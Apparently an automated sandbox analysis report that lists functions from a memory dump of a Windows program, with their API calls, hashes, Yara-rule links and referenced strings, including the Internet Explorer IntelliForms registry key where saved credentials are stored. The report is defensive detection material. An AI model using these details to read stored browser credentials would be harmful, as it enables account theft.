                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3015003838-0
                                                                                                                                                                  • Opcode ID: 157ba01f85cfbf502a73a237e895ba3edcb1d901ab41fe78731a80adfc8094fa
                                                                                                                                                                  • Instruction ID: b1728a7637de8f6c0c3372c087848d546b31592ea547c84e90bff2a5ea0aeb9c
                                                                                                                                                                  • Opcode Fuzzy Hash: 157ba01f85cfbf502a73a237e895ba3edcb1d901ab41fe78731a80adfc8094fa
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F41F27550C702AFE7218F20DC01BA7B7F1AB90B14F20496EF59552381DBB9D9C68B1E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00417E39, Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,004536AC,00417555,00000000,?,00000000,00000000), ref: 00417E63
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000), ref: 00417E6A
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417E77
                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00417E8C
                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,004536AC,00417555,00000000,?,00000000,00000000), ref: 00417E95
                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00417E9C
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417EA9
                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00417EBE
                                                                                                                                                                  • free.MSVCRT(00000000), ref: 00417EC7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2802642348-0
                                                                                                                                                                  • Opcode ID: a04d25dda4580931073b8405a409411f2d4958d2b117b70079af6824c241d029
                                                                                                                                                                  • Instruction ID: 47bfd0c0f8263ce6d61c00ded009a165ca5b61f2fc3d609cfbcfb361f1c4a64c
                                                                                                                                                                  • Opcode Fuzzy Hash: a04d25dda4580931073b8405a409411f2d4958d2b117b70079af6824c241d029
                                                                                                                                                                  • Instruction Fuzzy Hash: 1711063D5087149FCA2027706CC86BF36F49B57772B2102AAF953922D1DB2D4CC1956D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004147A8, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                  • API String ID: 3510742995-3273207271
                                                                                                                                                                  • Opcode ID: 40b6ca6cdc405dc99759052cebd1cbc672c98c7a28f502bbdac5d88d0a62fdf2
                                                                                                                                                                  • Instruction ID: 1058aa724a71ea66541b56df80d5a3cdc90ec5801de880f61679d0e38116f1b7
                                                                                                                                                                  • Opcode Fuzzy Hash: 40b6ca6cdc405dc99759052cebd1cbc672c98c7a28f502bbdac5d88d0a62fdf2
                                                                                                                                                                  • Instruction Fuzzy Hash: 2901927AE542A1A5F63031094C86FF74198DBE3B15FB14127FA96252C5E28D49C382AF
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A56F, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00408D9F: free.MSVCRT(?,00409176,00000000,?,00000000), ref: 00408DA2
                                                                                                                                                                    • Part of subcall function 00408D9F: free.MSVCRT(?,?,00409176,00000000,?,00000000), ref: 00408DAA
                                                                                                                                                                    • Part of subcall function 00413E4F: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62
                                                                                                                                                                    • Part of subcall function 00408EE8: free.MSVCRT(?,00000000,?,0040923F,00000000,?,00000000), ref: 00408EF7
                                                                                                                                                                  • memset.MSVCRT ref: 0040A5DF
                                                                                                                                                                  • RegEnumValueW.ADVAPI32 ref: 0040A60D
                                                                                                                                                                  • _wcsupr.MSVCRT ref: 0040A627
                                                                                                                                                                    • Part of subcall function 00408DC5: wcslen.MSVCRT ref: 00408DD7
                                                                                                                                                                    • Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408DFD
                                                                                                                                                                    • Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408E20
                                                                                                                                                                    • Part of subcall function 00408DC5: memcpy.MSVCRT ref: 00408E44
                                                                                                                                                                  • memset.MSVCRT ref: 0040A676
                                                                                                                                                                  • RegEnumValueW.ADVAPI32 ref: 0040A6A1
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040A6AE
                                                                                                                                                                  Strings
                                                                                                                                                                  • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0040A58C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                  • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                                                                                                                                  • API String ID: 4131475296-680441574
                                                                                                                                                                  • Opcode ID: 4844c8675b145070dad572f60e49686fb6ff8cc7004fd1c20b8f23b22dadcfc4
                                                                                                                                                                  • Instruction ID: 4ff845341dcd1a768bfc42e85b7312ef223b671260cd3b9f040e87321517091f
                                                                                                                                                                  • Opcode Fuzzy Hash: 4844c8675b145070dad572f60e49686fb6ff8cc7004fd1c20b8f23b22dadcfc4
                                                                                                                                                                  • Instruction Fuzzy Hash: AB413BB694021DABDB00EF99DC85EEFB7BCAF58304F10417AB504F2191DB789B458BA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B301, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040B382
                                                                                                                                                                    • Part of subcall function 0040B7F3: memset.MSVCRT ref: 0040B806
                                                                                                                                                                    • Part of subcall function 0040B7F3: _itow.MSVCRT ref: 0040B814
                                                                                                                                                                  • wcslen.MSVCRT ref: 0040B3A0
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE
                                                                                                                                                                  • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040B419
                                                                                                                                                                    • Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B299
                                                                                                                                                                    • Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2B7
                                                                                                                                                                    • Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2D5
                                                                                                                                                                    • Part of subcall function 0040B25F: ??2@YAPAXI@Z.MSVCRT ref: 0040B2F3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                  • String ID: strings
                                                                                                                                                                  • API String ID: 3166385802-3030018805
                                                                                                                                                                  • Opcode ID: 170e241d80e006e2339a4df759dc6eda6b269f3829da48b3c0b34544987349c1
                                                                                                                                                                  • Instruction ID: c57a50961ac065af18f7b97b0dfcf96f0970c66ac6ac5239858a4cd79fa145fe
                                                                                                                                                                  • Opcode Fuzzy Hash: 170e241d80e006e2339a4df759dc6eda6b269f3829da48b3c0b34544987349c1
                                                                                                                                                                  • Instruction Fuzzy Hash: 35415975200701BBDB259F14FC9593A3365E784387B20453EE802A73A3DB39EA16DB9C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040BA65, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                  • String ID: sysdatetimepick32
                                                                                                                                                                  • API String ID: 1028950076-4169760276
                                                                                                                                                                  • Opcode ID: 6b1542d4d031f34238e2cbf040c513ead73d2b908e87e6b72274d0d1e69de0e9
                                                                                                                                                                  • Instruction ID: cf2ea30055fd2b250d8a38ac5c403ff02bed82fd0d2b8d5d11e07c443477a94e
                                                                                                                                                                  • Opcode Fuzzy Hash: 6b1542d4d031f34238e2cbf040c513ead73d2b908e87e6b72274d0d1e69de0e9
                                                                                                                                                                  • Instruction Fuzzy Hash: D31177325002197BEB20EB91DC8AEEF777CEF45750F404066F509E1192EB749A41CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041B0F4, Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$memset
                                                                                                                                                                  • String ID: -journal$-wal
                                                                                                                                                                  • API String ID: 438689982-2894717839
                                                                                                                                                                  • Opcode ID: 06be32a774592b0ef8d9d06a82f4e809c6ae93f37653617c392a06c5b268a917
                                                                                                                                                                  • Instruction ID: 74a332e22f0b607a266e47b82b9d8ba1ef45136a3b8be849caa08d0d2b66e2c9
                                                                                                                                                                  • Opcode Fuzzy Hash: 06be32a774592b0ef8d9d06a82f4e809c6ae93f37653617c392a06c5b268a917
                                                                                                                                                                  • Instruction Fuzzy Hash: DCA1C071A0464AEFDB14DF64C8417DEBBB0FF04314F14826EE46997381D738AAA4CB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004050AF, Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00405153
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00405166
                                                                                                                                                                  • GetDlgItem.USER32 ref: 0040517B
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00405193
                                                                                                                                                                  • EndDialog.USER32(?,00000002), ref: 004051AF
                                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 004051C4
                                                                                                                                                                    • Part of subcall function 00404E6E: GetDlgItem.USER32 ref: 00404E7B
                                                                                                                                                                    • Part of subcall function 00404E6E: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00404E90
                                                                                                                                                                  • SendDlgItemMessageW.USER32 ref: 004051DC
                                                                                                                                                                  • SetDlgItemInt.USER32 ref: 004052ED
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Item$Dialog$MessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3975816621-0
                                                                                                                                                                  • Opcode ID: 59dd15e3fe8b474b1d57f3a51cd517dc36a76ec60ba9fafede058711fffef958
                                                                                                                                                                  • Instruction ID: 2cde12ba5927d4bde9809f16a4ff1e8400ea1fd37873b15a8c1cc8d9e94e8744
                                                                                                                                                                  • Opcode Fuzzy Hash: 59dd15e3fe8b474b1d57f3a51cd517dc36a76ec60ba9fafede058711fffef958
                                                                                                                                                                  • Instruction Fuzzy Hash: 6961B030600B05ABDB31AF25CC86B6B73A5FF50324F00863EF515AA6D1D778A951CF99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00443EEF, Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00443F6F
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00443F84
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00443F99
                                                                                                                                                                    • Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EBE
                                                                                                                                                                    • Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EC8
                                                                                                                                                                    • Part of subcall function 00407EAF: _memicmp.MSVCRT ref: 00407EE3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                  • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                  • API String ID: 1214746602-2708368587
                                                                                                                                                                  • Opcode ID: 6674e3096d4fb3cc11d8c201664f52075eac2e137ccc72f6e5920f39253551fb
                                                                                                                                                                  • Instruction ID: 597a29036d5ddd155e475e5b18437da6987c3908216f6d337c400390a4fd9aac
                                                                                                                                                                  • Opcode Fuzzy Hash: 6674e3096d4fb3cc11d8c201664f52075eac2e137ccc72f6e5920f39253551fb
                                                                                                                                                                  • Instruction Fuzzy Hash: A54135758087018AF7309EA5D94076773D8DB84B26F208D3FE56AE36C1EEBCE958411E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004052FD, Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2313361498-0
                                                                                                                                                                  • Opcode ID: 423ecc0e168efc5e236e770a124f59d01ae14c40ee3ccd0014aad091b91849b0
                                                                                                                                                                  • Instruction ID: 5d7335f69ca4f594208563f7014043d8df0e1bea6ea55c180c5050c90dc7a29e
                                                                                                                                                                  • Opcode Fuzzy Hash: 423ecc0e168efc5e236e770a124f59d01ae14c40ee3ccd0014aad091b91849b0
                                                                                                                                                                  • Instruction Fuzzy Hash: E931A4B1500A01AFEB14AF69C98691AB7A4FF04354710453FF545E7691DB78EC90CF98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040547A, Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClientRect.USER32 ref: 00405491
                                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 004054A9
                                                                                                                                                                  • GetWindow.USER32(00000000), ref: 004054AC
                                                                                                                                                                    • Part of subcall function 00401735: GetWindowRect.USER32 ref: 00401744
                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004054B8
                                                                                                                                                                  • GetDlgItem.USER32 ref: 004054CE
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040550D
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00405517
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405566
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2047574939-0
                                                                                                                                                                  • Opcode ID: f5a5d14270515fb7cfa2e3d83b9b50250a3f0f04f3c8a916ea04835abe187754
                                                                                                                                                                  • Instruction ID: ee080d675ccdbf70b04d6128f25a7e8090f7ef981af0433368dbc7d1a9e2eb74
                                                                                                                                                                  • Opcode Fuzzy Hash: f5a5d14270515fb7cfa2e3d83b9b50250a3f0f04f3c8a916ea04835abe187754
                                                                                                                                                                  • Instruction Fuzzy Hash: AB218071690B0977EA0137229D86F6B366DEF96714F10003AFA007B2C2EEBA580245AD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407F32, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EmptyClipboard.USER32(?,?,0040F25C,-00000210), ref: 00407F3A
                                                                                                                                                                  • wcslen.MSVCRT ref: 00407F47
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,0040F25C,-00000210), ref: 00407F57
                                                                                                                                                                  • GlobalLock.KERNEL32 ref: 00407F64
                                                                                                                                                                  • memcpy.MSVCRT ref: 00407F6D
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00407F76
                                                                                                                                                                  • SetClipboardData.USER32 ref: 00407F7F
                                                                                                                                                                  • CloseClipboard.USER32(?,?,0040F25C,-00000210), ref: 00407F8F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1213725291-0
                                                                                                                                                                  • Opcode ID: cdb750a96828277e3b05c43c57443b03ae672cf50655171118c2d7db54b82ba6
                                                                                                                                                                  • Instruction ID: 8669bfd28652b36aabcc6f95cbac9fd564b8d5c2b1f3dd921f492192fb7780cb
                                                                                                                                                                  • Opcode Fuzzy Hash: cdb750a96828277e3b05c43c57443b03ae672cf50655171118c2d7db54b82ba6
                                                                                                                                                                  • Instruction Fuzzy Hash: E8F0E03B600A157FD6103BF0BC4CF5B776CDBC6B96B01013AF905D6252DE68580487B9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00406FCE, Relevance: 11.4, APIs: 9, Instructions: 106stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00406FF4
                                                                                                                                                                  • memset.MSVCRT ref: 00407008
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,00407919,?,?,?,?,?,?,?,?,?), ref: 00407022
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,?,?,?,00407919,?,?,?,?,?,?,?,?), ref: 00407067
                                                                                                                                                                  • strcpy.MSVCRT(?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?,?,?), ref: 0040707B
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?), ref: 0040708E
                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040709D
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070C3
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070DD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4248099071-0
                                                                                                                                                                  • Opcode ID: 221fa140badc488d7490084bdd8a123b4b2ae1bb81a73de0e3900b412043c0ad
                                                                                                                                                                  • Instruction ID: 3602a3695f0633691502e701aaeaa3678f077821d3d25540d64766a890a16dc7
                                                                                                                                                                  • Opcode Fuzzy Hash: 221fa140badc488d7490084bdd8a123b4b2ae1bb81a73de0e3900b412043c0ad
                                                                                                                                                                  • Instruction Fuzzy Hash: A6412D7590021DAFDB20DF64CC80FDAB3FCBB09344F0485AAB559D2141DA34AB448F64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404F3A, Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00404F51
                                                                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00404F6A
                                                                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00404F77
                                                                                                                                                                  • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00404F83
                                                                                                                                                                  • memset.MSVCRT ref: 00404FE7
                                                                                                                                                                  • SendMessageW.USER32(?,0000105F,?,?), ref: 0040501C
                                                                                                                                                                  • SetFocus.USER32(?), ref: 004050A2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4281309102-0
                                                                                                                                                                  • Opcode ID: cabf6ed893144343294746ff1285555b4b015a401c90904a970732f73e5fe41f
                                                                                                                                                                  • Instruction ID: 4a7769bfe8dd657eebcefc70b29ecb6e887c437cb47c08b61b0609965a717ddb
                                                                                                                                                                  • Opcode Fuzzy Hash: cabf6ed893144343294746ff1285555b4b015a401c90904a970732f73e5fe41f
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B415975900219BBDB20DF95CC89EAFBFB9EF04754F1040AAF508A6291D3749A90CFA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040D26F, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintfwcscat
                                                                                                                                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                  • API String ID: 384018552-4153097237
                                                                                                                                                                  • Opcode ID: f46ff3c48073cbe96136da65081651e95d718f608025dc9e628f6efcf1769426
                                                                                                                                                                  • Instruction ID: 8f1261d6e50b9fc48a8d4c2a01cb2efc3c1dd918db621c17a7092c97f5fd87e6
                                                                                                                                                                  • Opcode Fuzzy Hash: f46ff3c48073cbe96136da65081651e95d718f608025dc9e628f6efcf1769426
                                                                                                                                                                  • Instruction Fuzzy Hash: 7E318D31900209EFDF04EF54CC86AAE7F75FF44320F1001AAE905AB2E2C738AA55DB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040B974, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                  • API String ID: 2029023288-3849865405
                                                                                                                                                                  • Opcode ID: 00042f4cecb0564cffffbf5123c116da2299592ae5eb2f27c9d7456f419c59bb
                                                                                                                                                                  • Instruction ID: 3c4375d2aaca836e1f5ba8730f1b4cbf28b1f601c5efe325adce4426e162c3cb
                                                                                                                                                                  • Opcode Fuzzy Hash: 00042f4cecb0564cffffbf5123c116da2299592ae5eb2f27c9d7456f419c59bb
                                                                                                                                                                  • Instruction Fuzzy Hash: 6A218B72605340ABD710DF55D845A9BB7E8FB89B54F00063FF644A2291E77ADA00CBDE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004086FA, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00408716
                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 00408742
                                                                                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 00408757
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00408767
                                                                                                                                                                  • wcscat.MSVCRT ref: 00408774
                                                                                                                                                                  • wcscat.MSVCRT ref: 00408783
                                                                                                                                                                  • wcscpy.MSVCRT ref: 00408795
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1331804452-0
                                                                                                                                                                  • Opcode ID: faaca5197708b47c47af442705d4c9df3f3a62e632b81e41ea1eb2464032714f
                                                                                                                                                                  • Instruction ID: e89223cf66055297cb9dadcb336121efaa359588445afa49c1b13fad1ad85cab
                                                                                                                                                                  • Opcode Fuzzy Hash: faaca5197708b47c47af442705d4c9df3f3a62e632b81e41ea1eb2464032714f
                                                                                                                                                                  • Instruction Fuzzy Hash: 3D1160B280011CBBEF11AF94DD45EEB7BBCEB41744F10407BBA04A6091D6389E448B79
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040D86C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040D8BF
                                                                                                                                                                  • <%s>, xrefs: 0040D8E2
                                                                                                                                                                  • <?xml version="1.0" ?>, xrefs: 0040D8B8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                  • API String ID: 3473751417-2880344631
                                                                                                                                                                  • Opcode ID: 6c1110d14c1add4ef8e68146380b3aae4225835160ec4e19b547157684646b60
